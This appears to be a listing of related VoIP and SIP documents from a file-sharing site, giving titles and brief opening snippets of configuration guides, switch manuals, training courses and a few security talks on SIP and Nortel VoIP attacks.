Ron Shuck, CISSP, CISM, CISA, GCIA Infrastructure Security Architect Spirit AeroSystems
Ron Shuck, CISSP, CISM, CISA, GCIA Infrastructure Security Architect Spirit AeroSystems VOIP Components Common Threats How Threats are Used Future Trends Provides basic network connectivity and transport
How to Configure the Allworx 6x, 24x and 48x for use with Integra Telecom SIP Solutions
How to Configure the Allworx 6x, 24x and 48x for use with Integra Telecom SIP Solutions Overview: This document provides a reference for configuration of the Allworx 6x IP PBX to connect to Integra Telecom
PENTEST. Pentest Services. VoIP & Web. www.novacybersecurity.com
PENTEST VoIP & Web Pentest Services VoIP & WEB Penetration Testing The Experinced and National VoIP/Unified Communications R&D organization, NETAŞ NOVA Pentest Services test the applications, infrastructure
Kerio Operator. Getting Started Guide
Kerio Operator Getting Started Guide 2011 Kerio Technologies. All rights reserved. 1 About Kerio Operator Kerio Operator is a PBX software for small and medium business customers. Kerio Operator is based
Provisioning and configuring the SIP Spider
Provisioning and configuring the SIP Spider Administrator Guide Table of Contents 1. Introduction... 3 2. Manual Provisioning... 4 3. Automatic Provisioning... 5 3.1 Concept... 5 3.2 Preparing the configuration
LifeSize Transit Deployment Guide June 2011
LifeSize Transit Deployment Guide June 2011 LifeSize Tranist Server LifeSize Transit Client LifeSize Transit Deployment Guide 2 Firewall and NAT Traversal with LifeSize Transit Firewalls and Network Address
Management Software. Web Browser User s Guide AT-S106. For the AT-GS950/48 Gigabit Ethernet Smart Switch. Version 1.0.0. 613-001339 Rev.
Management Software AT-S106 Web Browser User s Guide For the AT-GS950/48 Gigabit Ethernet Smart Switch Version 1.0.0 613-001339 Rev. A Copyright 2010 Allied Telesis, Inc. All rights reserved. No part of
Understand SIP trunk and registration in DWG gateway Version: 1.0 Dinstar Technologies Co., Ltd. Date: 2014. 09.29
Understand SIP trunk and registration in DWG gateway Version: 1.0 Dinstar Technologies Co., Ltd. Date: 2014. 09.29 http://www.dinstar.com 1 / 9 Contents Chapter 1: Authors and changes logs... 3 Chapter
Black Box Analysis and Attacks of Nortel VoIP Implementations
Black Box Analysis and Attacks of Nortel VoIP Implementations Richard Gowman, CISSP Eldon Sprickerhoff, CISSP CISA www.esentire.com Copyright 2007 esentire, Inc. Who we are... esentire, Inc. Based out
Voice Over IP. Priscilla Oppenheimer www.priscilla.com
Voice Over IP Priscilla Oppenheimer www.priscilla.com Objectives A technical overview of the devices and protocols that enable Voice over IP (VoIP) Demo Packet8 and Skype Discuss network administrator
16-PORT POWER OVER ETHERNET WEB SMART SWITCH
16-PORT POWER OVER ETHERNET WEB SMART SWITCH User s Manual (DN-95312) - 0 - Content Web Smart Switch Configure login ---------------------------------- 2 Administrator Authentication Configuration ---------------------------------------------
Storming SIP Security
Attack Sandro Gauci Difficulty VoIP is a hot and steadily gaining market share in the phone business. As people constantly seek to make long distance calls cheaper, they are moving away from relying on
IP Office Technical Tip
IP Office Technical Tip Tip no: 188 Release Date: September 27, 2007 Region: GLOBAL Verifying IP Office SIP Trunk Operation IP Office back-to-back SIP Line testing IP Office Release 4.0 supports SIP trunking.
Configuring SIP Support for SRTP
Configuring SIP Support for SRTP This chapter contains information about the SIP Support for SRTP feature. The Secure Real-Time Transfer protocol (SRTP) is an extension of the Real-Time Protocol (RTP)
The SIP School- 'Mitel Style'
The SIP School- 'Mitel Style' Course Objectives This course will take delegates through the basics of SIP into some very technical areas and is suited to people who will be installing and supporting SIP
NAT TCP SIP ALG Support
The feature allows embedded messages of the Session Initiation Protocol (SIP) passing through a device that is configured with Network Address Translation (NAT) to be translated and encoded back to the
Introducing Cisco Voice and Unified Communications Administration Volume 1
Introducing Cisco Voice and Unified Communications Administration Volume 1 Course Introduction Overview Learner Skills and Knowledge Course Goal and Course Flow Additional Cisco Glossary of Terms Your
